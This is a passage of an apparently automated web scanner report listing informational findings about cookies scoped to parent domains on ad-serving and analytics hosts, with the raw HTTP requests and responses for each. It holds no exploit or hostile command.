GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:05 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1735 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "2553663" ...[SNIP]...
12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/6451/11953/20435-2.js
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:41 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 2097 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "1295153" ...[SNIP]...
12.30. http://optimized-by.rubiconproject.com/a/dk.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.html
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:59:04 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Content-Length: 1968 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <style type="text/css"> body {margin:0px; padding:0px;} </style> <script type="tex...[SNIP]...
12.31. http://optimized-by.rubiconproject.com/a/dk.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/a/dk.js
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:15:56 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1712 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "3158455" ...[SNIP]...
12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A25%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone&r=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&cc=USD&c5=xss%20faq%20help%20contact%20phone&c20=New&v20=New&v24=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:25 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:25 GMT Last-Modified: Wed, 07 Sep 2011 15:54:25 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664231-3A57-2150C7DC" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www81 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845?AQB=1&ndh=1&t=6/8/2011%2015%3A58%3A5%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss&r=http%3A//www.oracle.com/openworld/tools/mobile/index.html&cc=USD&c5=xss&c20=New&v20=New&c24=no%20value&v24=http%3A//www.oracle.com/openworld/tools/mobile/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:58:06 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:58:06 GMT Last-Modified: Wed, 07 Sep 2011 15:58:06 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66430E-6576-4E5300FE" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www179 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499?AQB=1&ndh=1&t=6/8/2011%2015%3A56%3A13%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&v24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Results&pidt=1&oid=javascript%3AsearchDuplicateLink%281%2C10%2C482523%29%3B&ot=A&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:56:14 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:56:14 GMT Last-Modified: Wed, 07 Sep 2011 15:56:14 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66429E-469A-637CA977" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www107 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
